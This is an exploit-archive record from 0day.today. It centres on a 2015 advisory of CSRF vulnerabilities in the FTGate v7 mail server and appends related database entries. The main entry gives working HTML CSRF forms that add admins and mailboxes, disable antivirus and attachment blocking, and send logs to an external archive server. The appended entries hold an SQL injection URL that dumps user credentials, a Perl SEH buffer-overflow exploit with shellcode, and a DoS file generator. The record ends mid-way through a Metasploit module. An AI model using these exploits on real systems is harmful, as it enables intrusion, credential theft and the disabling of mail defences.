ID 1337DAY-ID-24346 Type zdt Reporter hyp3rlinx Modified 2015-10-02T00:00:00
Description
Exploit for php platform in category web applications
Vendor:
================================
www.ftgate.com
www.ftgate.com/ftgate-update-7-0-300
Product:
================================
FTGate v7
Vulnerability Type:
=================================
Cross site request forgery (CSRF)
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Multiple CSRF vectors exists within FTGate v7 allowing the following attacks
www.ftgate.com/ftgate-update-7-0-300
1) add arbitrary domains
2) enable arbitrary remote archiving of logs
3) whitelist arbitrary email addresses
4) add arbitrary mailbox & disable antivirus,
5) remove email attachment blocking for filez.
Exploit code(s):
===============
<!DOCTYPE>
<html>
<body onLoad="doit()">
<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
</script>
1) add arbitrary remote domain:
<form id='HELL' action="
http://localhost:8089/v7/wizards/adddomain.fts?action=save&id="
method="post">
<input type="text" name="name" value="abysmalgodz" />
<input type="text" name="type" value="1" />
</form>
2) enable arbitrary remote archive:
<form id='HELL' action="
http://localhost:8089/v7/webadmin/config/archive.fts?action=save"
method="post">
<input type="text" name="action" value="save" />
<input type="text" name="enable" value="on" />
<input type="text" name="duration" value="0" />
<input type="text" name="external" value="on" />
<input type="text" name="extarcserver" value="0.6.6.6" />
</form>
disable Antivirus for .exe files: also, has a persistent XSS inject but our
payload gets truncated at 5 chars,
but can corrupt the loading of valid XML returned from database to the WEB
UI.
e.g.
HTTP response after attack outputs corrupted XML generating errors.
<cell>exe</cell>
<cell/>
<cell><scri</cell>
<cell/>
</row>
<row id='id_"/><s'>
http://localhost:8089/v7/axml/adminlists.fts?table=ext&add=exe
<form id='HELL' action="
http://localhost:8089/v7/webadmin/filters/virus.fts?action=save&mailbox="
method="post">
<input type="text" name="mode" value="on" />
<input type="text" name="selftest" value="0ff" />
<input type="text" name="extGrid_id_exe_0" value="1" />
</form>
add arbitrary Admins:
http://localhost:8089/v7/axml/adminlists.fts?table=admin&add=ghostofsin
whitelist arbitrary email addresses:
Messages that originate from these email addresses are not filtered by the
Word or Phrase filters.
http://localhost:8089/v7/axml/whitelist.fts?id=531&[email protected]
<!--remove email attachment blocking for exe, hta & html filez -->
http://localhost:8089/v7/axml/attachments.fts?id=531&remove=7,10,3
when access the above URL it returns XML with all file extensions blocked
on incoming email, we now know ID in database.
so to remove blocking of .cmd we select '11'
http://localhost:8089/v7/axml/attachments.fts?id=531&remove=11
or remove blocking of multiple file types in one shot
http://localhost:8089/v7/axml/attachments.fts?id=531&remove=7,10,3
add arbitrary mailbox:
<form id='HELL' action="
http://localhost:8089/v7/wizards/addmailbox.fts?action=save&id=500"
method="post">
<input type="text" name="name" value="punksnotdead" />
<input type="text" name="type" value="0" />
<input type="text" name="cn" value="punksnotdead" />
<input type="text" name="password" value="punksnotdead" />
</form>
</body>
</html>
Disclosure Timeline:
========================================
Vendor Notification: September 29, 2015
October 1, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
Description:
==========================================================
Request Method(s): [+] GET
Vulnerable Product: [+] FTGate v7
Vulnerable Parameter(s): [+] type, id, mode, add, extarcserver
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
# 0day.today [2018-04-02] #
{"published": "2015-10-02T00:00:00", "id": "1337DAY-ID-24346", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T00:18:35", "bulletin": {"published": "2015-10-02T00:00:00", "id": "1337DAY-ID-24346", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 3.5, "modified": "2016-04-20T00:18:35", "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N/"}}, "hash": "c73d5fa9a4a5528507e275ee4f37b5cacb9310d5769df14f16c2401957e058c5", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T00:18:35", "edition": 1, "title": "FTGate 7 - CSRF Vulnerabilities", "href": "http://0day.today/exploit/description/24346", "modified": "2015-10-02T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/24346", "references": [], "reporter": "hyp3rlinx", "sourceData": "Vendor:\r\n================================\r\nwww.ftgate.com\r\nwww.ftgate.com/ftgate-update-7-0-300\r\n \r\n \r\nProduct:\r\n================================\r\nFTGate v7\r\n \r\n \r\nVulnerability Type:\r\n=================================\r\nCross site request forgery (CSRF)\r\n \r\n \r\nCVE Reference:\r\n==============\r\nN/A\r\n \r\n \r\nVulnerability Details:\r\n=====================\r\nMultiple CSRF vectors exists within FTGate v7 allowing the following attacks\r\nwww.ftgate.com/ftgate-update-7-0-300\r\n \r\n1) add arbitrary domains\r\n2) enable arbitrary remote archiving of logs\r\n3) whitelist arbitrary email addresses\r\n4) add arbitrary mailbox & disable antivirus,\r\n5) remove email attachment blocking for filez.\r\n \r\n \r\nExploit code(s):\r\n===============\r\n \r\n<!DOCTYPE>\r\n<html>\r\n<body onLoad=\"doit()\">\r\n<script>\r\nfunction doit(){\r\nvar e=document.getElementById('HELL')\r\ne.submit()\r\n}\r\n</script>\r\n \r\n1) add arbitrary remote domain:\r\n \r\n<form id='HELL' action=\"\r\nhttp://localhost:8089/v7/wizards/adddomain.fts?action=save&id=\"\r\nmethod=\"post\">\r\n<input type=\"text\" name=\"name\" value=\"abysmalgodz\" />\r\n<input type=\"text\" name=\"type\" value=\"1\" />\r\n</form>\r\n \r\n \r\n2) enable arbitrary remote archive:\r\n \r\n<form id='HELL' action=\"\r\nhttp://localhost:8089/v7/webadmin/config/archive.fts?action=save\"\r\nmethod=\"post\">\r\n<input type=\"text\" name=\"action\" value=\"save\" />\r\n<input type=\"text\" name=\"enable\" value=\"on\" />\r\n<input type=\"text\" name=\"duration\" value=\"0\" />\r\n<input type=\"text\" name=\"external\" value=\"on\" />\r\n<input type=\"text\" name=\"extarcserver\" value=\"0.6.6.6\" />\r\n</form>\r\n \r\ndisable Antivirus for .exe files: also, has a persistent XSS inject but our\r\npayload gets truncated at 5 chars,\r\nbut can corrupt the loading of valid XML returned from database to the WEB\r\nUI.\r\n \r\ne.g.\r\n \r\nHTTP response after attack outputs corrupted XML generating errors.\r\n \r\n<cell>exe</cell>\r\n<cell/>\r\n<cell><scri</cell>\r\n<cell/>\r\n</row>\r\n<row id='id_\"/><s'>\r\n \r\nhttp://localhost:8089/v7/axml/adminlists.fts?table=ext&add=exe\r\n \r\n \r\n<form id='HELL' action=\"\r\nhttp://localhost:8089/v7/webadmin/filters/virus.fts?action=save&mailbox=\"\r\nmethod=\"post\">\r\n<input type=\"text\" name=\"mode\" value=\"on\" />\r\n<input type=\"text\" name=\"selftest\" value=\"0ff\" />\r\n<input type=\"text\" name=\"extGrid_id_exe_0\" value=\"1\" />\r\n</form>\r\n \r\n \r\nadd arbitrary Admins:\r\n \r\nhttp://localhost:8089/v7/axml/adminlists.fts?table=admin&add=ghostofsin\r\n \r\nwhitelist arbitrary email addresses:\r\n \r\nMessages that originate from these email addresses are not filtered by the\r\nWord or Phrase filters.\r\n \r\nhttp://localhost:8089/v7/axml/whitelist.fts?id=531&add=hell@abyss.666\r\n \r\n<!--remove email attachment blocking for exe, hta & html filez -->\r\n \r\nhttp://localhost:8089/v7/axml/attachments.fts?id=531&remove=7,10,3\r\n \r\nwhen access the above URL it returns XML with all file extensions blocked\r\non incoming email, we now know ID in database.\r\nso to remove blocking of .cmd we select '11'\r\n \r\nhttp://localhost:8089/v7/axml/attachments.fts?id=531&remove=11\r\n \r\nor remove blocking of multiple file types in one shot\r\nhttp://localhost:8089/v7/axml/attachments.fts?id=531&remove=7,10,3\r\n \r\n \r\nadd arbitrary mailbox:\r\n \r\n<form id='HELL' action=\"\r\nhttp://localhost:8089/v7/wizards/addmailbox.fts?action=save&id=500\"\r\nmethod=\"post\">\r\n<input type=\"text\" name=\"name\" value=\"punksnotdead\" />\r\n<input type=\"text\" name=\"type\" value=\"0\" />\r\n<input type=\"text\" name=\"cn\" value=\"punksnotdead\" />\r\n<input type=\"text\" name=\"password\" value=\"punksnotdead\" />\r\n</form>\r\n \r\n</body>\r\n</html>\r\n \r\n \r\nDisclosure Timeline:\r\n========================================\r\nVendor Notification: September 29, 2015\r\nOctober 1, 2015 : Public Disclosure\r\n \r\n \r\nExploitation Technique:\r\n=======================\r\nRemote\r\n \r\n \r\nSeverity Level:\r\n================\r\nHigh\r\n \r\n \r\nDescription:\r\n==========================================================\r\nRequest Method(s): [+] GET\r\n \r\nVulnerable Product: [+] FTGate v7\r\n \r\nVulnerable Parameter(s): [+] type, id, mode, add, extarcserver\r\n \r\n===========================================================\r\n \r\n[+] Disclaimer\r\nPermission is hereby granted for the redistribution of this advisory,\r\nprovided that it is not altered except by reformatting it, and that due\r\ncredit is given. Permission is explicitly given for insertion in\r\nvulnerability databases and similar, provided that due credit is given to\r\nthe author.\r\nThe author is not responsible for any misuse of the information contained\r\nherein and prohibits any malicious use of all security related information\r\nor exploits by the author or elsewhere.\r\n \r\nby hyp3rlinx\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "09095340b944cabf63d780038a6d2578", "key": "title"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "a021db50a308ae0a285c8ded3d0a3027", "key": "sourceHref"}, {"hash": "e4377fe4ed4f8057107ca1b55f06094c", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "2232abbdf8d9a037ad298d13a698ec4e", "key": "href"}, {"hash": "1e27bca2fcc92db87e971d5cdcc91ee8", "key": "reporter"}, {"hash": "876eee4a607d30b5fb4c2278aceaa8eb", "key": "sourceData"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "e4377fe4ed4f8057107ca1b55f06094c", "key": "published"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "a90fb50fb63435fbeb12be1823d665f90548a3e4061ab1b5faa65cdd8e43cc91", "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2018-04-02T01:29:46"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:24346", "SECURITYVULNS:VULN:11018"]}, {"type": "zdt", "idList": ["1337DAY-ID-11018", "1337DAY-ID-8089"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/DOS/CISCO/IOS_HTTP_PERCENTPERCENT"]}], "modified": "2018-04-02T01:29:46"}, "vulnersScore": 0.4}, "type": "zdt", "lastseen": "2018-04-02T01:29:46", "edition": 2, "title": "FTGate 7 - CSRF Vulnerabilities", "href": "https://0day.today/exploit/description/24346", "modified": "2015-10-02T00:00:00", "bulletinFamily": "exploit", "viewCount": 6, "cvelist": [], "sourceHref": "https://0day.today/exploit/24346", "references": [], "reporter": "hyp3rlinx", "sourceData": "Vendor:\r\n================================\r\nwww.ftgate.com\r\nwww.ftgate.com/ftgate-update-7-0-300\r\n \r\n \r\nProduct:\r\n================================\r\nFTGate v7\r\n \r\n \r\nVulnerability Type:\r\n=================================\r\nCross site request forgery (CSRF)\r\n \r\n \r\nCVE Reference:\r\n==============\r\nN/A\r\n \r\n \r\nVulnerability Details:\r\n=====================\r\nMultiple CSRF vectors exists within FTGate v7 allowing the following attacks\r\nwww.ftgate.com/ftgate-update-7-0-300\r\n \r\n1) add arbitrary domains\r\n2) enable arbitrary remote archiving of logs\r\n3) whitelist arbitrary email addresses\r\n4) add arbitrary mailbox & disable antivirus,\r\n5) remove email attachment blocking for filez.\r\n \r\n \r\nExploit code(s):\r\n===============\r\n \r\n<!DOCTYPE>\r\n<html>\r\n<body onLoad=\"doit()\">\r\n<script>\r\nfunction doit(){\r\nvar e=document.getElementById('HELL')\r\ne.submit()\r\n}\r\n</script>\r\n \r\n1) add arbitrary remote domain:\r\n \r\n<form id='HELL' action=\"\r\nhttp://localhost:8089/v7/wizards/adddomain.fts?action=save&id=\"\r\nmethod=\"post\">\r\n<input type=\"text\" name=\"name\" value=\"abysmalgodz\" />\r\n<input type=\"text\" name=\"type\" value=\"1\" />\r\n</form>\r\n \r\n \r\n2) enable arbitrary remote archive:\r\n \r\n<form id='HELL' action=\"\r\nhttp://localhost:8089/v7/webadmin/config/archive.fts?action=save\"\r\nmethod=\"post\">\r\n<input type=\"text\" name=\"action\" value=\"save\" />\r\n<input type=\"text\" name=\"enable\" value=\"on\" />\r\n<input type=\"text\" name=\"duration\" value=\"0\" />\r\n<input type=\"text\" name=\"external\" value=\"on\" />\r\n<input type=\"text\" name=\"extarcserver\" value=\"0.6.6.6\" />\r\n</form>\r\n \r\ndisable Antivirus for .exe files: also, has a persistent XSS inject but our\r\npayload gets truncated at 5 chars,\r\nbut can corrupt the loading of valid XML returned from database to the WEB\r\nUI.\r\n \r\ne.g.\r\n \r\nHTTP response after attack outputs corrupted XML generating errors.\r\n \r\n<cell>exe</cell>\r\n<cell/>\r\n<cell><scri</cell>\r\n<cell/>\r\n</row>\r\n<row id='id_\"/><s'>\r\n \r\nhttp://localhost:8089/v7/axml/adminlists.fts?table=ext&add=exe\r\n \r\n \r\n<form id='HELL' action=\"\r\nhttp://localhost:8089/v7/webadmin/filters/virus.fts?action=save&mailbox=\"\r\nmethod=\"post\">\r\n<input type=\"text\" name=\"mode\" value=\"on\" />\r\n<input type=\"text\" name=\"selftest\" value=\"0ff\" />\r\n<input type=\"text\" name=\"extGrid_id_exe_0\" value=\"1\" />\r\n</form>\r\n \r\n \r\nadd arbitrary Admins:\r\n \r\nhttp://localhost:8089/v7/axml/adminlists.fts?table=admin&add=ghostofsin\r\n \r\nwhitelist arbitrary email addresses:\r\n \r\nMessages that originate from these email addresses are not filtered by the\r\nWord or Phrase filters.\r\n \r\nhttp://localhost:8089/v7/axml/whitelist.fts?id=531&[email\u00a0protected]\r\n \r\n<!--remove email attachment blocking for exe, hta & html filez -->\r\n \r\nhttp://localhost:8089/v7/axml/attachments.fts?id=531&remove=7,10,3\r\n \r\nwhen access the above URL it returns XML with all file extensions blocked\r\non incoming email, we now know ID in database.\r\nso to remove blocking of .cmd we select '11'\r\n \r\nhttp://localhost:8089/v7/axml/attachments.fts?id=531&remove=11\r\n \r\nor remove blocking of multiple file types in one shot\r\nhttp://localhost:8089/v7/axml/attachments.fts?id=531&remove=7,10,3\r\n \r\n \r\nadd arbitrary mailbox:\r\n \r\n<form id='HELL' action=\"\r\nhttp://localhost:8089/v7/wizards/addmailbox.fts?action=save&id=500\"\r\nmethod=\"post\">\r\n<input type=\"text\" name=\"name\" value=\"punksnotdead\" />\r\n<input type=\"text\" name=\"type\" value=\"0\" />\r\n<input type=\"text\" name=\"cn\" value=\"punksnotdead\" />\r\n<input type=\"text\" name=\"password\" value=\"punksnotdead\" />\r\n</form>\r\n \r\n</body>\r\n</html>\r\n \r\n \r\nDisclosure Timeline:\r\n========================================\r\nVendor Notification: September 29, 2015\r\nOctober 1, 2015 : Public Disclosure\r\n \r\n \r\nExploitation Technique:\r\n=======================\r\nRemote\r\n \r\n \r\nSeverity Level:\r\n================\r\nHigh\r\n \r\n \r\nDescription:\r\n==========================================================\r\nRequest Method(s): [+] GET\r\n \r\nVulnerable Product: [+] FTGate v7\r\n \r\nVulnerable Parameter(s): [+] type, id, mode, add, extarcserver\r\n \r\n===========================================================\r\n \r\n[+] Disclaimer\r\nPermission is hereby granted for the redistribution of this advisory,\r\nprovided that it is not altered except by reformatting it, and that due\r\ncredit is given. Permission is explicitly given for insertion in\r\nvulnerability databases and similar, provided that due credit is given to\r\nthe author.\r\nThe author is not responsible for any misuse of the information contained\r\nherein and prohibits any malicious use of all security related information\r\nor exploits by the author or elsewhere.\r\n \r\nby hyp3rlinx\n\n# 0day.today [2018-04-02] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "1c5013aa9d453e3a56d680e0cd118365", "key": "href"}, {"hash": "e4377fe4ed4f8057107ca1b55f06094c", "key": "modified"}, {"hash": "e4377fe4ed4f8057107ca1b55f06094c", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "1e27bca2fcc92db87e971d5cdcc91ee8", "key": "reporter"}, {"hash": "759d350f340d954bacaa4345fc4d6d96", "key": "sourceData"}, {"hash": "870731e024be8ea645fdd7bf69f20df7", "key": "sourceHref"}, {"hash": "09095340b944cabf63d780038a6d2578", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"securityvulns": [{"lastseen": "2018-08-31T11:10:35", "bulletinFamily": "software", "description": "Tested on:\r\nMedia Player Classic - Home Cinema\r\nBuild number: 1.3.1333.0\r\nMPC Compiler: VS 2008\r\nFFmpeg Compiler: GCC 4.4.1\r\n\r\n\r\n###################CRASH REPORT START##################\r\nModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll\r\nModLoad: 77bd0000 77bd7000 C:\WINDOWS\system32\midimap.dll\r\nModLoad: 73ee0000 73ee4000 C:\WINDOWS\system32\KsUser.dll\r\nModLoad: 10000000 100fb000 C:\Program Files\K-Lite Codec Pack\Filters\vsfilter.dll\r\nModLoad: 590b0000 590ce000 C:\WINDOWS\system32\wmpasf.dll\r\nModLoad: 71b20000 71b32000 C:\WINDOWS\system32\MPR.dll\r\nModLoad: 6bf50000 6bfcd000 C:\WINDOWS\system32\dxmasf.dll\r\nModLoad: 02530000 0257f000 C:\WINDOWS\system32\DRMClien.DLL\r\n(6dc.cec): C++ EH exception - code e06d7363 (!!! second chance !!!) ............................... ISSUE\r\neax=01c2f2e4 ebx=80040218 ecx=00000000 edx=00200003 esi=01c2f36c edi=003fd08c\r\neip=7c812aeb esp=01c2f2e0 ebp=01c2f334 iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll -\r\nkernel32!RaiseException+0x52:\r\n7c812aeb 5e pop esi\r\nMissing image name, possible paged-out or corrupt data.\r\nMissing image name, possible paged-out or corrupt data.\r\nMissing image name, possible paged-out or corrupt data.\r\n0:004> g\r\nWARNING: Continuing a non-continuable exception\r\n(6dc.cec): Break instruction exception - code 80000003 (first chance)\r\neax=01c2f2e4 ebx=80040218 ecx=00000000 edx=00200003 esi=00000000 edi=003fd08c\r\neip=0071d14b esp=01c2f37c ebp=01c2f39c iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206\r\nmpc_hc+0x31d14b:\r\n0071d14b cc int 3\r\n\r\n###################CRASH REPORT END##################\r\n\r\nFor images related to the vulnerability refer my blog\r\nhttp://darshanams.blogspot.com\r\n\r\n\r\n##########PoC Start################\r\nprint("\n*****Program need to be run on Python 3.1*****")\r\nprint ("""Media Player Classic - Home Cinema 1.3.1333.0 M3U File DoS (0-Day)\r\n\r\nTested on:\nWindows XP\r\nSP3\n\r\nMedia Player Classic - Home Cinema\n\t\t Build number: 1.3.1333.0\n\t\t\r\nMPC Compiler: VS 2008\n\t\t FFmpeg Compiler: GCC 4.4.1\n""")\r\n\r\nhead = "EXTM3U"\r\nbuf = "D" * 1000\r\n\r\nmal_buf = head + buf\r\n#print ("mal_buf:",mal_buf)\r\ntry:\r\nmpc_mal = open("mpc_m3u_crash.m3u",'w')\r\nmpc_mal.write (mal_buf)\r\nmpc_mal.close()\r\nprint ("File Created Successfully: mpc_m3u_crash.m3u\n")\r\nexcept:\r\nprint ("Cannnot Create M3U File\n")\r\n\r\nprint ("[+] Found and Coded by: Praveen Darshanam\r\n")\r\n##########PoC End################", "modified": "2010-07-28T00:00:00", "published": "2010-07-28T00:00:00", "id": "SECURITYVULNS:DOC:24346", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24346", "title": "Heap Overflow/DoS Vulnerability in Media Player Classic", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:38", "bulletinFamily": "software", "description": "Heap buffer overflow on .m3u playlist parsing.", "modified": "2010-07-28T00:00:00", "published": "2010-07-28T00:00:00", "id": "SECURITYVULNS:VULN:11018", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11018", "title": "Media Player Classic buffer overflow", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-03-12T17:09:11", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2010-02-22T00:00:00", "published": "2010-02-22T00:00:00", "id": "1337DAY-ID-11018", "href": "https://0day.today/exploit/description/11018", "type": "zdt", "title": "Ero Auktion v2.0 (news.php) SQL Injection Vulnerability", "sourceData": "=======================================================\r\nEro Auktion v2.0 (news.php) SQL Injection Vulnerability\r\n=======================================================\r\n\r\n----------------------------Information----------------------------------------\r\n+Autor : Easy Laster\r\n+Date : 21.10.2010\r\n+Script : Ero Auktion V.2.0 SQL Injection news.php\r\n+Download : -----\r\n+Price : 34,90?\r\n+Language :PHP\r\n+Discovered by Easy Laster\r\n\r\n--------------------------------------------------------------------------------\r\n+Vulnerability : www.Site.com/news.php?id=[SQL]\r\n+Exploitable : www.site.com/flashauktion/news.php?id=11111111+union+select+1,\r\n2,concat%28name,0x3a,password%29,4,5+from+users\r\n--------------------------------------------------------------------------------\r\n\r\n\r\n\n# 0day.today [2018-03-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/11018"}, {"lastseen": "2018-03-13T03:04:24", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category local exploits", "modified": "2009-08-31T00:00:00", "published": "2009-08-31T00:00:00", "id": "1337DAY-ID-8089", "href": "https://0day.today/exploit/description/8089", "type": "zdt", "title": "Hex Workshop 4.23//5.1//6.0 (.hex) Universal Local BOF Exploits (SEH)", "sourceData": "=====================================================================\r\nHex Workshop 4.23//5.1//6.0 (.hex) Universal Local BOF Exploits (SEH)\r\n=====================================================================\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\n# by hack4love\r\n# Hex Workshop v3//4//5//6 (.hex) Universal Local Buffer ExploitS (SEH)\r\n# Found By: DATA_SNIPER\r\n# http://www.bpsoft.com/downloads/\r\n######################################################################################\r\n##info:: i write 3 exploits for the 3 v\r\n######################################################################################\r\n# USE>>file>>import>>hack4love.hex>> boom calc\r\n######################################################################################\r\n#\r\n#Hex Workshop v 3.11\r\n#\r\n######################################################################################\r\nmy $hed1=\":0000FC...\";\r\nmy $hed2=\"\\n:\";\r\nmy $bof=\"41\" x 172;\r\nmy $nsh=\"EB069090\";\r\nmy $seh=\"62380012\";\r\nmy $nop=\"90\" x 20;\r\nmy $sec=\r\n\"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302\";\r\n\r\nprint $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;\r\n#######################################################################################\r\nopen(myfile,'>> HACK4LOVE.hex');\r\nprint myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;\r\n######################################################################################\r\n######################################################################################\r\n######################################################################################\r\n######################################################################################\r\n#\r\n#Hex Workshop V 4.00 // v 4.20\r\n#\r\n######################################################################################\r\nmy $hed1=\":0000FC...\";\r\nmy $hed2=\"\\n:\";\r\nmy $bof=\"41\" x 172;\r\nmy $nsh=\"EB069090\";\r\nmy $seh=\"62380012\";\r\nmy $nop=\"90\" x 20;\r\nmy $sec=\r\n\"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302\";\r\n\r\nprint $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;\r\n\r\n######################################################################################\r\nopen(myfile,'>> HACK4LOVE.hex');\r\nprint myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;\r\n######################################################################################\r\n######################################################################################\r\n######################################################################################\r\n#\r\n#Hex Workshop V 4.21 // 4.22 // 4.23\r\n#\r\n######################################################################################\r\nmy $hed1=\":0000FC...\";\r\nmy $hed2=\"\\n:\";\r\nmy $bof=\"41\" x 176;\r\nmy $nsh=\"EB069090\";\r\nmy $seh=\"8c29d374\";\r\nmy $nop=\"90\" x 20;\r\nmy $sec=\r\n\"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302\";\r\n\r\nprint $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;\r\n\r\n######################################################################################\r\nopen(myfile,'>> HACK4LOVwwE.hex');\r\nprint myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;\r\n######################################################################################\r\n######################################################################################\r\n######################################################################################\r\n######################################################################################\r\n#\r\n#Hex Workshop v 5\r\n#v5.0 beta 1//v5.0.0.2511//v5.0.1.272//v5.0.2.2769//v5.1.1.3963/v5.1.3.4159/v5.1.4.4188\r\n#\r\n######################################################################################\r\nmy $hed1=\":0000FC...\";\r\nmy $hed2=\"\\n:\";\r\nmy $bof=\"41\" x 172;\r\nmy $nsh=\"EB069090\";\r\nmy $seh=\"38f8d374\";\r\nmy $nop=\"90\" x 20;\r\nmy $sec=\r\n\"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302\";\r\n\r\nprint $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;\r\n#######################################################################################\r\nopen(myfile,'>> HACK4LOsssVE.hex');\r\nprint myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;\r\n#######################################################################################\r\n#######################################################################################\r\n#######################################################################################\r\n#######################################################################################\r\n#\r\n#Hex Workshop v6.0.0.4582 //v6.0.1.4603\r\n#\r\n#######################################################################################\r\n#######################################################################################\r\nmy $hed1=\":0000FC...\";\r\nmy $hed2=\"\\n:\";\r\nmy $bof=\"41\" x 2228;\r\nmy $nsh=\"EB069090\";\r\nmy $seh=\"38f8d374\";\r\nmy $nop=\"90\" x 20;\r\nmy $sec=\r\n\"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302\";\r\n\r\nprint $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;\r\n\r\n#########################################################################################\r\nopen(myfile,'>> HACK4LOVE.hex');\r\nprint myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;\r\n#######################################################################################\r\n\r\n\r\n\r\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8089"}], "metasploit": [{"lastseen": "2019-12-11T16:22:24", "bulletinFamily": "exploit", "description": "This module exploits a format string vulnerability in versions of the Washington University FTP server older than 2.6.1. By executing specially crafted SITE EXEC or SITE INDEX commands containing format specifiers, an attacker can corrupt memory and execute arbitrary code.\n", "modified": "2017-07-24T13:26:21", "published": "2009-12-06T02:30:42", "id": "MSF:EXPLOIT/MULTI/FTP/WUFTPD_SITE_EXEC_FORMAT", "href": "", "type": "metasploit", "title": "WU-FTPD SITE EXEC/INDEX Format String Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Ftp\n include Msf::Exploit::FormatString\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 